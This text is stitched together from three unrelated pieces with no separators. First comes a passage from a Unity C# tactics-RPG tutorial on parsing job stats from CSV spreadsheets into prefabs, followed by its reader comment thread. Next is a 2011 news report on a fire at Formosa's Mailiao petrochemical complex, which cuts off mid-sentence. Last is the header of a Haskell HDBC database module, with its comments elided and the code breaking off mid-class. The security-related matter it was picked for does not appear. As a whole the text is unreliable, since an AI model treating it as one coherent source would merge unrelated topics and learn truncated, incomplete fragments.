        string readPath = string.Format("{0}/Settings/JobStartingStats.csv", Application.dataPath);
        string[] readText = File.ReadAllLines(readPath);
        for (int i = 1; i < readText.Length; ++i)
            ParseStartingStats(readText[i]);
    }

    static void ParseStartingStats (string line)
    {
        string[] elements = line.Split(',');
        GameObject obj = GetOrCreate(elements[0]);
        Job job = obj.GetComponent<Job>();

        // The first seven stat columns are base stats...
        for (int i = 1; i < Job.statOrder.Length + 1; ++i)
            job.baseStats[i - 1] = Convert.ToInt32(elements[i]);

        // ...while MOV and JMP become StatModifierFeature components.
        GetFeature(obj, StatTypes.MOV).amount = Convert.ToInt32(elements[8]);
        GetFeature(obj, StatTypes.JMP).amount = Convert.ToInt32(elements[9]);
    }

    static void ParseGrowthStats ()
    {
        string readPath = string.Format("{0}/Settings/JobGrowthStats.csv", Application.dataPath);
        string[] readText = File.ReadAllLines(readPath);
        for (int i = 1; i < readText.Length; ++i)
            ParseGrowthStats(readText[i]);
    }

    static void ParseGrowthStats (string line)
    {
        string[] elements = line.Split(',');
        GameObject obj = GetOrCreate(elements[0]);
        Job job = obj.GetComponent<Job>();
        for (int i = 1; i < elements.Length; ++i)
            job.growStats[i - 1] = Convert.ToSingle(elements[i]);
    }

    static StatModifierFeature GetFeature (GameObject obj, StatTypes type)
    {
        StatModifierFeature[] smf = obj.GetComponents<StatModifierFeature>();
        for (int i = 0; i < smf.Length; ++i)
        {
            if (smf[i].type == type)
                return smf[i];
        }

        StatModifierFeature feature = obj.AddComponent<StatModifierFeature>();
        feature.type = type;
        return feature;
    }

    static GameObject GetOrCreate (string jobName)
    {
        string fullPath = string.Format("Assets/Resources/Jobs/{0}.prefab", jobName);
        GameObject obj = AssetDatabase.LoadAssetAtPath<GameObject>(fullPath);
        if (obj == null)
            obj = Create(fullPath);
        return obj;
    }

    static GameObject Create (string fullPath)
    {
        GameObject instance = new GameObject("temp");
        instance.AddComponent<Job>();
        GameObject prefab = PrefabUtility.CreatePrefab(fullPath, instance);
        GameObject.DestroyImmediate(instance);
        return prefab;
    }
}
Because this is a pre-production script, I didn’t put a lot of effort into it. There are hard-coded strings, repeated bits of code, etc., that could all be cleaned up, but this script isn’t meant to be re-usable and doesn’t need to be performant, so I felt no need to waste time on it. As long as it works, I am happy.
In order to make this script work its magic, we added a MenuItem tag. As the name implies, this adds a new entry into Unity’s menu bar. You should see a new entry called “Pre Production” and under that an option called “Parse Jobs”. Select that and our Job assets will be created in the project.
You can easily delete and recreate these assets at any time. Because of this, you might choose to ignore these assets in your source control repository, not that it hurts to keep them. All you truly need to version is the spreadsheet and parser, not the result of using them together.
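If you do decide to ignore the generated prefabs, ignore rules like the following would cover them. This is only a sketch for git, assuming the folder layout used in this lesson; note that Unity also generates a .meta file alongside each prefab:

```
Assets/Resources/Jobs/*.prefab
Assets/Resources/Jobs/*.prefab.meta
```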
It is possible to “listen” for changes to your spreadsheets and have the assets re-created automatically. See my post on Bestiary Management and Scriptable Objects for an example of this.
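As a quick illustration of that idea, an editor script along these lines could re-run the parser whenever one of the spreadsheets is re-imported. This is only a sketch built on Unity’s AssetPostprocessor callback and the JobParser class from this lesson; the linked post covers the approach properly:

```csharp
using UnityEditor;

// Sketch: re-run the job parser whenever a job spreadsheet under Settings changes.
public class JobSheetWatcher : AssetPostprocessor
{
	static void OnPostprocessAllAssets (string[] importedAssets, string[] deletedAssets, string[] movedAssets, string[] movedFromAssetPaths)
	{
		for (int i = 0; i < importedAssets.Length; ++i)
		{
			// Only react to the job spreadsheets, not every asset import
			if (importedAssets[i].Contains("Settings/Job") && importedAssets[i].EndsWith(".csv"))
			{
				JobParser.Parse();
				break;
			}
		}
	}
}
```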
Init Battle State
Now that movement range and jump height stats can be driven by a job, let’s change our SpawnTestUnits code to create one of each of the three sample job types. The code to create and configure our units is getting a bit long, which is an indication that we will probably need some sort of factory class soon.
void SpawnTestUnits ()
{
	string[] jobs = new string[]{ "Rogue", "Warrior", "Wizard" };
	for (int i = 0; i < jobs.Length; ++i)
	{
		GameObject instance = Instantiate(owner.heroPrefab) as GameObject;

		Stats s = instance.AddComponent<Stats>();
		s[StatTypes.LVL] = 1;

		GameObject jobPrefab = Resources.Load<GameObject>("Jobs/" + jobs[i]);
		GameObject jobInstance = Instantiate(jobPrefab) as GameObject;
		jobInstance.transform.SetParent(instance.transform);
		Job job = jobInstance.GetComponent<Job>();
		job.Employ();
		job.LoadDefaultStats();

		Point p = new Point((int)levelData.tiles[i].x, (int)levelData.tiles[i].z);
		Unit unit = instance.GetComponent<Unit>();
		unit.Place(board.GetTile(p));
		unit.Match();

		instance.AddComponent<WalkMovement>();

		units.Add(unit);

		// Rank rank = instance.AddComponent<Rank>();
		// rank.Init(10);
	}
}
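If you wanted a head start on that factory idea, the job-related setup could be pulled out into a helper like the one below. This is purely a hypothetical refactor of the code above, not something the lesson implements:

```csharp
// Hypothetical helper: creates a hero instance and employs the named job.
// Uses only the calls already appearing in SpawnTestUnits above.
GameObject CreateHeroWithJob (string jobName)
{
	GameObject instance = Instantiate(owner.heroPrefab) as GameObject;
	Stats s = instance.AddComponent<Stats>();
	s[StatTypes.LVL] = 1;

	GameObject jobPrefab = Resources.Load<GameObject>("Jobs/" + jobName);
	GameObject jobInstance = Instantiate(jobPrefab) as GameObject;
	jobInstance.transform.SetParent(instance.transform);

	Job job = jobInstance.GetComponent<Job>();
	job.Employ();
	job.LoadDefaultStats();
	return instance;
}
```

A real factory would probably also handle placement and movement components, but that can wait until the duplication actually hurts.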
Movement
We will also need to convert our Movement component into a wrapper much like the Rank component was. For this, add a field to store a reference to the Stats component, and then turn range and jumpHeight into properties as follows:
public int range { get { return stats[StatTypes.MOV]; }}
public int jumpHeight { get { return stats[StatTypes.JMP]; }}
protected Stats stats;
Have the component get its reference to the Stats component in the Start method:
protected virtual void Start () { stats = GetComponent<Stats>(); }
Demo
Open the main Battle scene and play it. There should be three units as there were before, though we removed the variation in movement types; everyone walks for now. Note that the range of the units differs depending on the job they began with.
Switch the inspector to Debug mode so that you can see the private stat data in the Stats component. You should see the values have been set according to the starting stats which we had specified for the job.
Stop the scene and go back to the SpawnTestUnits method of the InitBattleState then uncomment the two lines where we add the Rank component and init the starting level to 10. Play the scene a few times and look at the stats of each hero. You should see slight differences in the stats thanks to the random bonus portion of the Job.
Summary
In this lesson we discussed the various purposes of a Jobs system and looked at references from the Final Fantasy series. Then we began implementing our game via spreadsheets so that it would be easy to see and balance the data. We created an editor script which could then parse our spreadsheets and create prefabs as project assets. Finally, we tied these systems back into the main game so that our demo units have stats (including movement stats) which are driven by their job.
Don’t forget that the project repository is available online here. If you ever have any trouble getting something to compile, or need an asset, feel free to use this resource.
62 thoughts on “Tactics RPG Jobs”
Excellent!!! Another great tutorial!!!!
A quick question for you: Why, in the updated Movement class, did you put the line where you connect the stats component in the Start method, instead of the awake method, where you have the other connectors (unit and jumper)?
I tried it with the connector in the Start method, and the stat line was never run, causing an error when range or jumpHeight tried to reference stats; the entire Start method wasn’t run, which is strange to me. Thinking I had mistyped something, I copied the Movement class from your repository, and experienced the same error. Putting the connector line in the Awake function fixed the problem.
I figured it out- I had left a blank Start method in WalkMovement that was overriding the Movement.Start method.
I am still curious about the reasoning for placing it in start vs awake, however 🙂 Is it to make sure the Stats are loaded before connecting it?
Good question Jordan, I don’t remember any particular reason why I put it in Start instead of Awake. Perhaps just an oversight. Sometimes there are reasons – like if I was manually adding components instead of including them with the prefab, but in this case both Awake and Start would work fine.
Alright, I got prefab generation based on .asset files to work. Basically each prefab has an ‘item’ component attached, but one of the variables in item is ‘sprite’.
I don’t think there is a way to assign a sprite in the CSV file that generates the .asset, unless I reference the image name/path directly. This seems like bad practice.
Is there a good method for data-driving images onto a prefab?
I don’t think I would reference a whole path in the csv, but referencing the name of a sprite doesn’t seem bad to me. You can also try naming conventions so that the names of prefabs have similarly named assets which can be loaded, though in many cases the simple rules end up with too many exceptions and you might as well do it all.
Do you think it’s best for me to fill the item data at runtime or to do it in editor similar to the .asset file generation?
So for example, I have a bunch of prefabs with an ‘Item’ class attached but that class doesn’t have values assigned for its variables yet. Should I assign the variables at runtime only, or would you do it automagically through Editor scripts?
It depends. If you reuse the same prefab with different item data sets then I would do it at runtime. If you always pair exactly the same prefab with exactly the same data, then I would do it at Editor time.
I’ve been looking for an example resource but I’m having trouble finding one. Do you know of any good resources where the name of a file is referenced in an external data file and then that file is linked to the prefab?
You must put the file in a “Resources” folder and then use “Resources.Load” – you don’t even need to know the path as long as it is in the root of the resources folder.
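For example, if a CSV column held the sprite’s name, a parser could resolve it with something like the following. The names here (elements, item, the Sprites subfolder) are my own assumptions for illustration, not part of the project:

```csharp
// elements[1] is assumed to hold the sprite name from the CSV row,
// and the sprite asset is assumed to live under a Resources/Sprites folder.
Sprite sprite = Resources.Load<Sprite>("Sprites/" + elements[1]);
if (sprite == null)
	Debug.LogWarning("No sprite found named " + elements[1]);
else
	item.sprite = sprite;
```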
Okay, I love your tutorial so far, but now I get an error saying “ArgumentException: The thing you want to instantiate is null.” It brings me to the line GameObject jobInstance = Instantiate(jobPrefab) as GameObject; in SpawnTestUnits, but I don’t understand what could be wrong here.
Glad you are enjoying it. Did you remember to run the “Pre Production/Parse Jobs” menu command? You won’t be able to instantiate a job prefab if you didn’t create it first.
I’m also getting this error, and I ran “Pre Production/Parse Jobs” command before hitting the play button.
I wish I could edit my posts here, but the problem was I had misspelled “Rogue” in the stat.csv as “Rouge”. When that was fixed it could find everything fine.
Hey man,
I’ve got a confusing error:
Assets/Scripts/Exceptions/ValueChangeException.cs(39,25): error CS1501: No overload for method `Modify’ takes `1′ arguments
Also, none of my scripts will load (“Script cannot be loaded” everywhere).
Do you know what I could do to solve this mistake?
Could it be that I have `using System;` and `using System.Collections.Generic;` everywhere, and that this is sending me the error message?
Okay, I solved everything. ^^
But is it true that now my heroes just walk and don’t fly or teleport at the moment?
Yep – but feel free to alter it to your liking
Hi Jon!
I just completed this part, and I couldn’t figure out where I could see the stats growth after uncommenting the lines for Rank in the Demo.
I ended up just doing a debug.log so I could see it. Was I supposed to see those stats somewhere else?
Setting up a simple Debug Log is a perfect way to test for now. The stat growth wouldn’t mean much until you had some other sort of data that persisted outside of a battle, and I only built the battle portion of this project. I felt that the non-battle portions were less complicated, and would also be more varied, so I hoped that my readers would be able to implement it based on their own design.
First of all, I am loving these tutorials. I appreciate how much effort you put into automating processes like putting jobs together. Seems really smart for balancing purposes to quickly change a value in a .csv and then pushing a button in unity to update all the objects.
I am using this idea and putting it towards creating a skill tree type system but I am running into an issue where the created prefab is being cleared (all values set to NULL) when I push play in Unity. Any idea why this may be happening?
Thanks again!
I’m glad you’re enjoying them! Regarding your issue, do you experience a similar problem when using the Job prefabs? Do the skill prefabs hold values before you push play? Do they also regain their values after you exit play mode? If so, it might be that something in your code is clearing the values.
Yeah, the skill prefabs are holding their values before pushing play and after pushing play. Upon exiting play the list that the skills are contained in is set to Null along with all the skills in my resource folder. Upon reparsing the values are restored.
I’m going to make some tweaks to the skill tree and skill classes so that the data is private and see if that works. I’ll let you know how it goes. Thanks.
After playing around with the classes I am still running into the issue where the asset values are set to NULL after exiting play, as well as when reopening the project.
I find this strange because I am not encountering this issue with the job assets created from this tutorial.
Here is my set up; I have a Skill class which holds several variables. The variables are private and are set through the parsing command. After the Skill is made it is added to the skill tree class. The skill tree class is simply a private list.
I really wonder what could be causing the values to be set to NULL when exiting play and reopening the project. If you have any idea hit me up. Thanks again for sharing your knowledge!
Perhaps if you could share your project – or at least a simplified version with the Skill class, Skill Tree class, parser and sample data to parse I could recreate what you are seeing and might be able to help you out.
What’s the best way to share? Just copy and paste here? I am perfectly ok sharing it.
You could zip your project and share with a link via something like drive.google.com or if you want to just copy and paste the relevant code, perhaps you could start a new thread on my forum since it is a bit off topic for this post.
I created a post on the forum and added a zip with the scripts in question. Let me know what you think!
I started your tutorial here and I like what I see so far. I noticed that you mentioned a job tree kind of system. I got excited and tried to skip ahead to find it, but it seems that you did not actually get into it.
Any chance you will do that at some point? Or give some direction on how to make it with this one? For example, add another experience stat like a job point stat? Keep job levels like fftactics did?
I didn’t actually implement the Job Tree in this project, and only hinted about the possibility. You seem to have picked up on the idea just like I’d hoped. I had been imagining something much like what you have suggested – creating new job related stats such as a string for a job name to use for evolution and an integer for the level required to upgrade. Beyond that you would just need to create a system to either observe the level up notifications or to provide a menu that could control the activation etc.
I see, thank you for confirming my thoughts! I ended up adding some extra logic to the onlevelup/changed parts, making a new separate JobLevelListener script attached to an extra GameObject in my battle scenes to record it. I’m still debating putting a stat on the unit for it or not, as that would be a lot of extra code. Right now I save it to an external file and read from that in a unit selection stage to change the jobs based on level.
I finally got my system working all the way! I took a closer look at what you had on scriptable objects.
I started by making a scriptable object with the name, then a list of required jobs, then a list of required levels.
I can add any new job, then simply add base requirements of other job levels to unlock it.
I read all the jobs in the resource folder, then check them for the job subreqs. This way I only show currently useable jobs, or soon to be attained jobs for characters in the job change view. Made a simple overlay that when I finish will display the requirements if not met, or be disabled if the job can be selected already.
Now I am looking to improve on the abilities system. I hope to make different skills unlock at different levels in the class. Any suggestions on how to do this? I was thinking I could just read the job level and have a case statement in my character factory: check the current job level, find the case for that level range, then add a number to the ability file to load, maybe. A level 5 mage only knows missile attacks; a level 10 knows AoE elemental magic as well. Then attach the ability SO to the unit. What do you think?
Also am looking at using the same job level to check for a mastered class, and if a class is mastered, be able to equip a second list of abilities. ( No idea what I will do here yet.)
Awesome, congrats! Regarding other tips, I’d suggest opening a new thread in my forums. It’s too much for a nested comment to handle well.
Any reason this wouldn’t work for the LevelUp function?
void LevelUp ()
{
for (int i = 0; i < statOrder.Length; ++i)
{
StatTypes type = statOrder[i];
int growth = Mathf.FloorToInt(growStats[i] + UnityEngine.Random.value);
int value = stats[type];
value += growth;
stats.SetValue(type, value, false);
}
stats.SetValue(StatTypes.HP, stats[StatTypes.MHP], false);
stats.SetValue(StatTypes.MP, stats[StatTypes.MMP], false);
}
Basically instead of juggling variables and doing an if statement I just added the number to the stats and truncated it.
Also I'm still having trouble getting errors at the top of the website. I thought this one was fine, but it's just the home page that isn't having errors.
Warning: count(): Parameter must be an array or an object that implements Countable in ….. on line 284
It seems like there was a purpose to the fractional part of the stat, but to be perfectly honest, I don’t remember why that code is written that way. I know that I was closely following a mechanics guide and that they did things a little weird due to platform limitations etc. Mostly I did this so I didn’t have to put any effort into designing my own systems and could focus merely on getting something working. I would encourage you to feel free to redesign any or all of the systems as you see fit!
I’m not sure why you’re getting errors on the website, but I will try to look into it a bit.
Hi, how many elements should I be seeing for the Stats (script), and should they be named yet in the debug window? (I think no for the second question, but I just need to double check.) Across all of the Hero(Clone)s, I see Element 10 and Element 11 at 0, with Elements 12, 13, and 14 representing (presumably) speed, mov, and jump. All the other stats also seem accounted for from Elements 0-9. Everything other than Elements 10 and 11 is a non-zero value that seems to make sense and matches the csv, at level 1 at least.
Should I be seeing those two elements at a value of 0? they seem extra to me, but nothing else is broken. I’m afraid I left some code snippet in or something that I wasn’t supposed to, but I don’t want to start a grand search just yet since everything else is fine, and I plan to move to the next lesson for now.
There are 15 total elements, indexed from 0 to 14. They are not named when viewed through the Debug inspector other than being listed as “Element 0” etc. The elements at 10 and 11 currently hold the value of 50 for each of the heroes. They are configured on the Jobs prefabs via “Stat Modifier Feature” components – one for each with the Type specified as EVD and RES.
Thanks for the quick response! I’m afraid I must still not be understanding something, as I don’t know where the value 50 gets added to this. From your guidance, and a little backtracking, I now get that those elements came from the StatTypes enumeration, but im still unsure where the value of 50 gets defined or set. it looks like I could manually change the stat in the inspector for an instance on the StatModifierFeature component, but I’m trying to figure out where in the code the value for those two stats of the generated prefab is produced. (The two attributes are not in the CSV’s either from what I am seeing.) I also don’t think I see EVD or RES mentioned in this lesson, so I’m unsure where to look right now.
No, I think you are on top of things. It has been a long time since I made this, so I had to look a little deeper. If I delete the job prefab objects and recreate them in the repository project then they will end up with 0 for those two stats. I probably created the jobs, then added the stats manually (which in the long run is not an ideal way to do it). Good catch!
Ah thanks again for the response and explanation! Everything has been really helpful for me on getting a grasp of how to create my own projects.
So apparently you can’t add components to prefabs anymore… you have to use LoadPrefabContents or something. Has nobody run into this problem?
You can still add components to prefabs, they just modified how you view them in the interface. After selecting a prefab click the “Open Prefab” button in the inspector to view its first level contents like normal.
Oh, I meant in the code, in the JobParser script. CreatePrefab, I think, is the one that is obsolete.
Ah, you’re right, the docs say it is obsolete now: – too bad they don’t also point us to the right place. 🙂
I saw a forum post saying it was something like saveassetprefab and loadasassetprefab, but I don’t know, I couldn’t figure it out. What I have been trying to do is just create the jobs as scriptable objects, but I am having trouble getting it to work. Your coding skills are WAY more advanced than mine! I am having trouble learning. Is the whole Liquid Fire site all you? I have tried to back up and get better. I am thinking about the CCG tutorial. Any suggestions as to where to start on your website? I read through all of the beginner stuff, and I understand most of it.
Yep, pretty much everything on this site is mine (I did borrow simple scripts in some places and give credit then). As far as where to start, that’s a good question. Generally I would have suggested the Tactics RPG because the architectural choices I made (which rely heavily on Unity) are very simple for beginners to understand. It is pretty old by now though and it’s not surprising that some of the content is now obsolete. The Unofficial Pokemon Board Game project was also pretty simple as I made it with my son to help him learn. I can’t comment on whether it will have the same issues.
Each of my tutorial projects use different IDE’s, languages, and even different architectural styles, so you may want to favor whichever topic is most important or interesting to you. Unless you truly grasp all of the material you may find it difficult to apply concepts between the projects because of those differences.
Hello. While going through this excellent tutorial I’ve run into this same issue. I made a few changes to the JobParser script to work around that. I can share my version of the script with you if you like.
For some reason I was unable to reply to the poster below, but I would love to see your version of the script, @matteo, and how you changed the job parser.
Perhaps if you have it on Google Drive or such; but I would request that you first give a link to just the methods needed. It would be more beneficial for me to try to learn my way to a usable example and then compare with what you came up with afterwards.
Okay thanks for the advice! I will continue with the rpg then
for anyone that’s getting this error:
Assertion failed on expression: ‘!go.TestHideFlag(Object::kNotEditable)’
UnityEngine.GameObject:AddComponent()
I have made minor alterations to the job parser script. TLF’s approach was deprecated, which is causing the issue; you can read more here:.
The script change makes the PartsStartingStats function look like this:
static void PartsStartingStats (string line)
{
	string[] elements = line.Split(',');
	string path = "Assets/Resources/Jobs/" + elements[0].ToString() + ".prefab";
	GameObject obj = null;
	if (File.Exists(path))
	{
		obj = PrefabUtility.LoadPrefabContents(path);
	}
	else
	{
		Debug.Log(string.Format("load prefab contents did not run. checked location {0}", path));
		obj = GetOrCreate(elements[0]);
	}
	Job job = obj.GetComponent<Job>();
	for (int i = 1; i < elements.Length; ++i)
		job.baseStats[i - 1] = Convert.ToInt32(elements[i]);
}
Made some more changes to the script so it was stable:
static void PartsStartingStats (string line)
{
	string[] elements = line.Split(',');
	string path = "Assets/Resources/Jobs/" + elements[0].ToString() + ".prefab";
	GameObject obj = null;
	if (File.Exists(path))
	{
		obj = PrefabUtility.LoadPrefabContents(path);
	}
	else
	{
		obj = PrefabUtility.SaveAsPrefabAsset(new GameObject(), path);
		obj = PrefabUtility.LoadPrefabContents(path);
	}
	Job job = obj.GetComponent<Job>() ? obj.GetComponent<Job>() : obj.AddComponent<Job>();
	Debug.Log(string.Format("object is: {0}. job is {1}", obj, job));
	for (int i = 1; i < elements.Length; ++i)
		job.baseStats[i - 1] = Convert.ToInt32(elements[i]);
	PrefabUtility.SaveAsPrefabAsset(obj, path); // write the edits back before unloading
	PrefabUtility.UnloadPrefabContents(obj);
}

static void ParseGrowthStats (string line)
{
	string[] elements = line.Split(',');
	string path = "Assets/Resources/Jobs/" + elements[0].ToString() + ".prefab";
	GameObject obj = PrefabUtility.LoadPrefabContents(path);
	Job job = obj.GetComponent<Job>() ? obj.GetComponent<Job>() : obj.AddComponent<Job>();
	for (int i = 1; i < elements.Length; ++i)
		job.growStats[i - 1] = Convert.ToSingle(elements[i]);
	PrefabUtility.SaveAsPrefabAsset(obj, path); // write the edits back before unloading
	PrefabUtility.UnloadPrefabContents(obj);
}
cheers
Thanks for sharing 🙂
First off: thanks for putting in all the effort with such a cohesive and easy to understand tutorial series!
As someone coming from more simple scripting in GMS 2.0, I started this series when I swapped to Unity, to help build out a concept for a squad tactics game I’ve always wanted to make. It wouldn’t be an exaggeration to say that I’m learning at least one new concept about programming an entry. Keep up the good work!
Second: are there any architectural changes you would make to this setup if rather than a Final Fantasy style job system, you were modeling something more like a MOBA or the XCOM games, where character and abilities are intrinsic to one another?
Currently I’ve adapted the job components from this tutorial to hold character-specific stats, but before I take it further and start modeling abilities I’m wondering if there isn’t a better method or pattern I’m overlooking.
My specific case is that I’d like each character to have a generic basic attack derived from an equipped weapon, but other than that, a unique name, art, stats, and a pool of abilities, giving each different tactical value in different situations.
Glad you’re enjoying the series. It may be a surprise, but I haven’t played XCOM or similar MOBA games, so I am not familiar with the mechanics you want. I imagine that I would almost certainly make large architectural changes that were specific to the game I wanted to make. I rarely reuse game specific code, and will usually only reuse things like my notification or animation libraries. You will see that is the case if you follow along with my other projects – they all feel very different from each other. If you need specific help, feel free to post in my forums and I’ll do my best.
Ah, I see. I’ll definitely check out the other projects to see how you approached their design challenges once I’m done reading through this one.
As for characters, I’m finding the notification center, exceptions, and component-based design are already excellent patterns for the kind of mechanics I’m looking for.
The only considerable difference between FFT and what I have in mind is that characters have a single unique “job”. That is, they each have a predetermined set of abilities they can unlock. Because of the narrower scope, these abilities can be crafted to synergize tightly with one another, using special resources, applying unique buffs or debuffs, etc. Exceptions seem like a perfect tool for this kind of design.
Anyhow, If I run into any difficulties I’ll be sure to drop by and post!
This might seem like a simple question, but currently I am trying to add a new stat (CRIT) into the current list of stats, however the program refuses to comply, throwing this error as a result:
IndexOutOfRangeException: Array index is out of range.
Job.LoadDefaultStats () (at Assets/Scripts/View Model Component/Actor/Job.cs:58)
FYI, the only pieces of code that I changed are adding the CRIT stat into:
1. StatTypes script
2. the statorder array in Job script
3. JobStartingStats with the necessary values
HOWEVER, I found out that the program runs normally if one of the current existing stat types in the statorder array is replaced by my new CRIT stat.
Any ideas why this is happening?
First let me make sure you understand the error. Let’s say you have an array of integers named “foo” that looks like this: ‘[4, 2, 7]’. The Length of the array is ‘3’ because there are three integers. The index values of each are { 0, 1, 2 }, and I refer to elements in the array by that index, so if I say ‘foo[2]’ I would get the last number in the array which is ‘7’. If I say ‘foo[3]’ I would get an IndexOutOfRangeException because there are no values at that index – we have tried to get a value outside the range of the array.
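In code, the example from that explanation looks like this:

```csharp
int[] foo = new int[] { 4, 2, 7 };
int last = foo[2]; // 7: the last valid index is Length - 1
int oops = foo[3]; // throws IndexOutOfRangeException
```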
What that means is that the array that is referenced by the Job script on line 58 is probably smaller than you think it is and you need to understand why. It sounds like you’ve already added the necessary values to most of the necessary places, but don’t forget ‘JobGrowthStats’ and then make sure you don’t forget to run the ‘Pre Production -> Parse Jobs’ menu action as well.
Turns out I forgot to delete the preexisting prefab and run Parse Jobs again. Thanks for the reply though!
Another option for you: instead of a new stat, you could derive crit from two other stats, maybe speed and strength?
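If you took that route, the derived stat could be exposed as a read-only property rather than an array entry, something like the sketch below. The formula and the SPD/ATK stat names are my own assumptions for illustration, not from the project:

```csharp
// Hypothetical derived stat: no storage and no extra CSV column needed.
public int crit { get { return (stats[StatTypes.SPD] + stats[StatTypes.ATK]) / 2; }}
```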
Hi, I’ve run into an issue:
“No overload for method ‘LoadAssetAtPath’ takes ‘1’ arguments”
static GameObject GetOrCreate (string jobName)
{
	string fullPath = string.Format("Assets/Resources/Jobs/{0}.prefab", jobName);
	GameObject obj = AssetDatabase.LoadAssetAtPath<GameObject>(fullPath);
	if (obj == null)
		obj = Create(fullPath);
	return obj;
}
Looking at the definition of the LoadAssetAtPath method it takes a second parameter of ‘Type type’ but I’ve got no idea what that would be.
Version of Unity is 5.0.0f4 Personal.
Thanks for your help.
Wow, that’s an old version of Unity. I guess you went back that far because that’s how old the tutorial was when I started writing it! I don’t know if you are aware, but you can change the version of Unity’s documentation. Though unfortunately even that only goes back to Unity version 5.2.
The non-generic version of LoadAssetAtPath would need you to give type information. In this case, the type of object we are trying to load is a GameObject. So, the line might look like one of these for the second parameter:
GameObject obj = AssetDatabase.LoadAssetAtPath(fullPath, GameObject);
GameObject obj = AssetDatabase.LoadAssetAtPath(fullPath, typeof(GameObject));
And it may also need either a prefix or postfix cast like one of these:
GameObject obj = (GameObject)AssetDatabase.LoadAssetAtPath(fullPath, typeof(GameObject));
GameObject obj = AssetDatabase.LoadAssetAtPath(fullPath, typeof(GameObject)) as GameObject;
Hope that helps!
Thanks for the response. I’d actually found a workaround using Resources.Load, so
GameObject obj = Resources.Load(fullPath, typeof(GameObject)) as GameObject;
but it looks like
GameObject obj = (GameObject)AssetDatabase.LoadAssetAtPath(fullPath, typeof(GameObject));
works as well, so I’ll go with that.
Thanks for your help.
Oh and yeah I’ve gotten stuck with tutorials before due to version changes, so I figured I’d go with the same version of Unity you did the tutorial in.
27 July 2011 07:13 [Source: ICIS news]
By Nurluqman Suratman
SINGAPORE: The 26 July fire at Formosa’s Mailiao petrochemical complex in Taiwan, the fifth such incident at the site this year, broke out at a section of a hydrogen pipeline in the vicinity, sources said.
“There was a small fire, but it did not damage any plants,” a spokesperson from Formosa Petrochemical Corp (FPCC) said, adding that the firm’s 1.03m tonne/year No 2 and 1.2m tonne/year No 3 crackers at the complex are running at full capacity.
However, Formosa Plastics Corp (FPC) had to shut its polyethylene (PE) and ethylene vinyl acetate (EVA) units at the complex as a cautionary measure, an FPC source said.
“Plant operators are very careful nowadays because there’ve been so many fires over the past months,” the FPC source said.
The affected facilities comprise a 264,000 tonne/year linear low density PE (LLDPE) plant, a 350,000 tonne/year high density PE (HDPE) unit and a 240,000 tonne/year low density PE (LDPE)/EVA swing plant, the source added.
“We have no idea how long the plant will remain shut because the situation is unclear,” the source said.
China-based traders said there may be some impact on the EVA market if the outage at FPC’s EVA plant is prolonged beyond a week.
“A week-long outage should not have any impact on the market because demand for EVA from the downstream footwear and hot melt adhesives industries lacks force,” the source said.
Among other units at the complex, production at Formosa BP Chemicals Corp’s (FBPC) 300,000 tonne/year acetic acid plant at Mailiao was unaffected by the fire and is operating at full capacity, a company official said.
Formosa BP Chemicals (FBPC) is an equally owned joint venture between BP and Formosa Chemicals and Fibre Corporation.
Nan Ya Plastics’ four monoethylene glycol (MEG) units in Mailiao, which have a combined capacity of 1.8m tonnes/year, are also running "normally" at 85-90% following the fire, sources said.
“There has been no impact at all on our factories [from the fire], but we still need to check with FPCC if their plants will be running normally,” said David Tsou, a spokesperson at the investor relations department of Nan Ya Plastics.
FPC's ethylene dichloride (EDC), vinyl chloride monomer (VCM), polyvinyl chloride (PVC) and caustic soda plants are also unaffected by the fire and the company has no plans to shut any of the units, according to a company source.
The company’s 98,000 tonne/year methyl methacrylate (MMA) acetone cyanohydrin-based unit in Mailiao is also running at full tilt, a company source said.
FPC shut its 100,000 tonne/year ECH unit at the site immediately after the fire, but has scheduled to restart it on 27 July, according to a company source.
A pipeline fire at the complex on 12 May had forced FPCC to shut its 700,000 tonne/year No 1 cracker and downstream 109,000 tonne/year butadiene (BD) extraction unit for inspection, while the local government in Yunlin county ordered Nan Ya Plastics to shut five units at its nearby Haifung factory for safety review.
While Nan Ya Plastics has gained approval to restart its 360,000 tonne/year No 3 and 720,000 tonne/year No 4 MEG plants at Haifung, three other units remain shut pending approval from the local government, according to Tsou.
Formosa Chemicals & Fibre Corp (FCFC) was also ordered to shut its No 1 aromatics unit, which can produce 150,000 tonnes/year of benzene, 100,000 tonnes/year of isomer-grade mixed xylenes and 270,000 tonnes/year of paraxylene (PX), following the blaze on 12 May.
Earlier this week, Yunlin county officials were expected to give FCFC permission to restart the No 1 unit soon, but the 26 July fire may potentially delay the approval process, sources said.
The company’s No 2 and No 3 aromatics units at the site are unaffected by the 26 July fire.
FPCC was also originally scheduled to restart its No 1 cracker in Mailiao this week, but the incident may potentially derail the company’s restart plans, sources said.
FPCC had earlier said it planned to restart the No 1 cracker before the turnaround at its No 3 cracker to prevent feedstock shortage for its derivative facilities.
The No 3 cracker is scheduled to be shut for a 40-45 day turnaround in the middle of August, but it is not clear if this will be postponed, sources said.
Traders and end-users said it is still too early to say whether there will be any impact on BD pricing because details on the impact of the fire are still unclear.
“Maybe Formosa may delay or cancel some BD cargoes and BD prices may go up, but it is too early to say,” a Japanese trader said.
“Even if Formosa were to cancel or delay their BD shipments, there is a lot of supply from China and we don’t see any serious shortage or impact on the BD market,” an end-user said.
Asia BD prices fell to $4,100-4,150/tonne (€2,829-2,864/tonne) CFR (cost & freight) NE (northeast) Asia on 22 July, down by $150/tonne from an all-time high of $4,250-4,300/tonne CFR NE Asia on 15 July.
Additional reporting by Peh Soo Hwee, Chow Bee Lin, Feliana Widjaja, Loh Bohan, Mahua Chakravarty, Helen Lee, Helen Yan, Gabriel Yip, Judith Wang and Junie Lin
($1 = €0
http://www.icis.com/Articles/2011/07/27/9480137/taiwans-formosa-restart-plans-may-get-delayed-by-fire.html
{- |
   Module     : Database.HDBC.Types
   Copyright  : Copyright (C) 2005-2009 John Goerzen
   License    : GNU LGPL, version 2.1 or above
   Maintainer : John Goerzen <jgoerzen@complete.org>
   Stability  : provisional
   Portability: portable

Types for HDBC.

Please note: this module is intended for authors of database driver libraries
only. Authors of applications using HDBC should use 'Database.HDBC'
exclusively.

Written by John Goerzen, jgoerzen\@complete.org
-}

module Database.HDBC.Types
    (IConnection(..),
     Statement(..),
     SqlError(..),
     nToSql, iToSql, posixToSql,
     fromSql, safeFromSql, toSql,
     SqlValue(..),
     ConnWrapper(..),
     withWConn
    )
where

import Database.HDBC.Statement
import Database.HDBC.ColTypes
import Control.Exception (finally)

{- | ... -}
class IConnection conn where
    {- | ... 'Statement's active. In more precise language, the results in
       such situations are undefined and vary by database. So don't do
       it. -}
    disconnect :: conn -> IO ()

